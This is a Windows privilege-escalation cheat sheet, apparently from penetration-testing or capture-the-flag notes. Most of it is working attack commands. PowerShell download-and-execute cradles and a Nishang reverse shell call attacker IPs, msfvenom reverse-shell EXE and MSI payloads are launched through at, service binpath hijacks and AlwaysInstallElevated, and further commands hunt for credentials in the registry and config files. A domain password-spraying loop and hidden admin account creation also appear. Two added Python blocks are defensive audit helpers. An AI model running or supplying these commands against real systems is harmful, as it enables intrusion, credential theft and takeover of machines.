Pretty much where I have pulled most of this content.
```cmd
# Simple PowerShell command
powershell -command ("whoami")
```
```cmd
# Download a file (similar to Linux's wget)
powershell -command (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:1234/rottenpotato.exe','C:\Users\Public\potato.exe')
```
```cmd
# Download a script and execute it in memory (outer double quotes so cmd hands the whole cradle to PowerShell):
powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip_address>/full_path/script_name.ps1')"
```
```cmd
# You have a cmd.exe shell but want a PowerShell one:
## Start a Python HTTP server in Nishang/Shells, then download the script
powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.19/Invoke-PowerShellTcp.ps1','C:\Users\Public\Invoke-PowerShellTcp.ps1')
# Now that the file is downloaded, import and execute it:
powershell -exec bypass -c Import-Module .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443
```
One-liner reverse PowerShell from cmd:
```cmd
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.56.104/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.56.104 -Port 443"
```
```cmd
# Basic queries:
hostname
whoami
echo %USERNAME%
net users
net user <username>
net localgroup
net group /domain
netstat -ano
netsh firewall show state
# How well is the system patched?
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Scheduled tasks query:
schtasks /query /fo LIST /v
tasklist /SVC
# Show all started Windows services:
net start
# Check for 3rd-party drivers:
DRIVERQUERY
```
PowerView.ps1 queries the Domain Controller and checks whether the current Windows user has admin privileges on other hosts. If so, we can psexec to those hosts to get Admin.
```powershell
powershell -exec bypass
Import-Module .\powerview.ps1
Find-LocalAdminAccess
```
```powershell
# How to import and use PETools from PowerSploit
## The easiest way to move the data is a Python HTTP server, used to
## get everything in the PETools directory onto the victim.
Import-Module PETools.psd1
Get-Command -Module PETools
```
```cmd
# Check for password strings:
findstr /si password *.txt *.xml *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
# Check for common password files:
dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
```
```cmd
# Search for autologon credentials:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# Search for VNC password:
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Search for PuTTY credentials:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for passwords in HKLM:
reg query HKLM /f password /t REG_SZ /s | clip
# Search for passwords in HKCU:
reg query HKCU /f password /t REG_SZ /s | clip
```
```cmd
# Look for local services that are listening:
netstat -ano
# Port forward using plink:
plink.exe -l root -pw mysecretpass 192.168.0.10 -R 8080:127.0.0.1:8080
```
Github Repository is linked above but, if you’re lazy, here it is again.
On the Windows host:
```cmd
systeminfo > systeminfo.txt
```
Transfer the file back to Kali and run it against the Python exploit suggester.
On the Kali host:
```bash
# Update the database:
python windows-exploit-suggester.py -u
# Use the new database against systeminfo.txt:
python windows-exploit-suggester.py -d 2018-08-21-mssb.xls -i systeminfo.txt
```
The at command can be used locally to get SYSTEM privileges, since the at scheduler executes its jobs as SYSTEM.
```bash
# Generate the payload binary:
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 -f exe > shell.exe
# Move the binary to Windows and schedule it with at:
at 13:20 /interactive shell.exe
```
```cmd
# Look for tasks that are run by a privileged user and run a binary that we can overwrite:
schtasks /query /fo LIST /v
# Copy and paste the output into a Linux terminal and look for SYSTEM:
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
# Point the service binpath at your binary:
sc config upnphost binpath= "C:\Inetpub\nc.exe 192.168.1.101 6666 -e c:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
# Restart the service:
wmic service NAMEOFSERVICE call startservice
## OR:
net stop [service name] && net start [service name]
```
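The grep pipeline above pairs each "Task To Run" line with the "Run As User: SYSTEM" line that follows it. As an added audit example (not from the original page), the Python below parses the LIST output of `schtasks /query /fo LIST /v` into one record per task and reports the SYSTEM tasks whose binary lives outside the Windows directory; the sample output is constructed, modelled on the real field names.

```python
# Added example: parse 'schtasks /query /fo LIST /v' output and report tasks
# that run as SYSTEM from a binary outside C:\Windows (the page's grep filter).
# SAMPLE is constructed; blank lines separate tasks, as in the real output.
SAMPLE = r"""
HostName:      WS01
TaskName:      \Vendor\Updater
Task To Run:   C:\Program Files\Vendor App\updater.exe /silent
Start In:      N/A
Run As User:   SYSTEM

HostName:      WS01
TaskName:      \Microsoft\Windows\Defrag\ScheduledDefrag
Task To Run:   %windir%\system32\defrag.exe -c -h -o -$
Start In:      N/A
Run As User:   SYSTEM

HostName:      WS01
TaskName:      \Backup\Nightly
Task To Run:   C:\Tools\backup.exe
Start In:      N/A
Run As User:   WS01\backupsvc
"""

SYSTEM_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\")

def parse_list_output(text: str) -> list[dict]:
    """Split LIST output into one dict per task; 'Field:   value' per line."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")   # first colon ends the field name
        current[key.strip()] = value.strip()
    if current:
        tasks.append(current)
    return tasks

def system_tasks_outside_windows(text: str) -> list[tuple[str, str]]:
    """(TaskName, Task To Run) for SYSTEM tasks whose binary is not under Windows."""
    hits = []
    for task in parse_list_output(text):
        if task.get("Run As User", "").upper() != "SYSTEM":
            continue
        cmd = task.get("Task To Run", "")
        if cmd.lower().startswith(SYSTEM_PREFIXES):
            continue   # OS-owned path; only the vendor/third-party tasks remain
        hits.append((task.get("TaskName", "?"), cmd))
    return hits

if __name__ == "__main__":
    for name, cmd in system_tasks_outside_windows(SAMPLE):
        print(f"{name}: {cmd}")
```

A flagged task is only a finding if the reported binary (or its directory) is writable by a low-privileged user, which icacls on that path will tell you.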
An unquoted service path vulnerability arises when a developer fails to enclose the service's file path in quotes and that path contains a space. File paths that are properly quoted are treated as absolute and are therefore not affected.
So if we find a service path without quotes, like the one below, it is vulnerable:
C:\Program Files\Some Folder\1\Service.exe
Windows would try to execute, in order:
C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\1\Service.exe
So if we have write access to one of those directories, we can write a file with the matching name into it:
```cmd
# Check for vulnerable programs (auto-start, outside C:\Windows, path not quoted):
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
icacls "C:\Program Files\Some Folder"
sc query
sc query <service_name>
# Generate payload:
msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe
# Change binary path:
sc config <service_name> binpath= "C:\shell.exe"
# Reboot or restart the service:
shutdown /r /t 0
sc stop <servicename> & sc start <servicename>
## OR
wmic service NAMEOFSERVICE call startservice
## OR:
net stop [service name] && net start [service name]
```
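As an added audit example (not code from the original page), the Python below reproduces the lookup order described above for a given service ImagePath and applies the same filter as the wmic line (auto-start, outside C:\Windows, unquoted), so a defender can list exactly which services need their path quoted; the sample services are constructed.

```python
# Added audit helper (not from the original page): reproduces the lookup order
# Windows uses for an unquoted service path with spaces, and applies the same
# filter as the wmic line above (auto-start, outside C:\Windows, unquoted).
WINDOWS_DIR = "c:\\windows\\"

def candidate_paths(image_path: str) -> list[str]:
    """Executables Windows may try, in order, before reaching the real binary.
    A quoted path is unambiguous, so only the quoted binary is returned."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return [s[1:end] if end != -1 else s[1:]]
    parts = s.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)      # the intended binary (or a lookalike)
            break
        # CreateProcess appends .exe to a prefix that has no extension
        candidates.append(prefix + ".exe" if i < len(parts) else prefix)
    return candidates

def is_unquoted_risk(image_path: str, start_mode: str = "Auto") -> bool:
    """True when the service auto-starts, lives outside C:\\Windows, is unquoted
    and has at least one space before its executable name."""
    s = image_path.strip()
    if start_mode.lower() != "auto" or s.startswith('"'):
        return False
    if s.lower().startswith(WINDOWS_DIR):
        return False
    return len(candidate_paths(s)) > 1

def audit(services: list[tuple[str, str, str]]) -> list[str]:
    """services: (name, pathname, startmode) tuples as you would read them from
    'wmic service get name,pathname,startmode'. Returns the names to quote."""
    return [name for name, path, mode in services if is_unquoted_risk(path, mode)]

# Constructed sample, modelled on the page's example path
SAMPLE_SERVICES = [
    ("SomeSvc", r"C:\Program Files\Some Folder\1\Service.exe", "Auto"),
    ("Quoted", r'"C:\Program Files\Vendor App\svc.exe" -k netsvcs', "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("Manual", r"C:\Program Files\Other App\svc.exe", "Manual"),
]

if __name__ == "__main__":
    for name, path, mode in SAMPLE_SERVICES:
        print(f"{name}: risk={is_unquoted_risk(path, mode)} tries={candidate_paths(path)}")
```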
```cmd
# WMIC - we try this first:
wmic service list brief
# Get a list of service binaries (outside system32) and store it to a file:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
# Check the permissions on each binary in the list:
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

# SC.EXE - we try this second:
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
## This gives us the paths; we can now run cacls "path" on each of them.

# Check for service permissions by auth type:
Accesschk.exe -uwcqv "Authenticated Users" *
Accesschk.exe -uwcqv "Users" *
Accesschk.exe -uwcqv "Everyone" *
# If you find one that has weak permissions:
Accesschk.exe -ucqv <Service_Name>
sc qc <service_name>
# We might be able to overwrite the binary the service is pointing to.
sc stop upnp.exe
sc config upnp.exe binpath= "net user lokii lokii /add"
sc start upnp.exe
net user
# Check to see if the user has been added to the host machine.
```
```cmd
cacls "c:\Program Files" /T | findstr Users
```
The AlwaysInstallElevated policy installs all .msi packages with SYSTEM privileges for every user.
```cmd
# REG_DWORD 0x1 signifies that AlwaysInstallElevated is set and on:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both keys must be set; check the user hive too:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#---------------------------------------------------#
# Initial MSI payload:                              #
#---------------------------------------------------#
# If the bit is set then we:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.101 lport=443 -f msi > shell.msi
# Upload the shell to the Windows host using whatever method tickles your fancy and run:
msiexec /quiet /qn /i shell.msi
#----------------------------------------------------#
# Secondary MSI payload:                             #
#----------------------------------------------------#
# We add a user in Windows and create a secondary payload to add it to Administrators:
net user lokii lokii /add
msfvenom -p windows/exec CMD='net localgroup administrators lokii /add' -f msi > upgrade.msi
```
msiexec flags used above:
- /quiet = suppress any messages to the user during installation
- /qn = no GUI
- /i = regular (vs. administrative) installation
A loop that iterates over all the users in users.txt and tries all the passwords listed in pass.txt. It can be used with the net user /domain command listed above to cover every user in the domain.
```cmd
# Get a list of users:
net user /domain > users.txt
# Run the following script:
@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL
# Example:
net user /domain > DomainUsers.txt
echo "Password1" >> pass.txt
echo "1q2w3e4r" >> pass.txt
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\
```
Simply use a DLL written in C++ whose DllMain contains malicious code, or points to a malicious function in the code such as a shellcode loader or a downloader/executor.
```cmd
# Check to see if UPNPHOST is running and what its dependencies are:
sc qc upnphost
# Attempt to overwrite the binpath:
sc config upnphost binpath= "C:\evil.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
```
If you have a GUI session as a user who is in the Administrators group, you first need to open cmd.exe as the administrator. The cmd shortcut in Accessories opens as a normal user, and if you right-click it and choose Run as Administrator you might need the Administrator's password, which you might not know. So instead open cmd from c:\windows\system32\cmd.exe; this will give you a cmd with Administrators rights.
From here we want to become the SYSTEM user. First we check what time it is on the local machine:
```cmd
time
# Now set the time at which the SYSTEM cmd should start, probably one minute after the current time:
at 01:23 /interactive cmd.exe
```
Get PsExec onto the system and run:
```cmd
psexec -i -s cmd.exe
```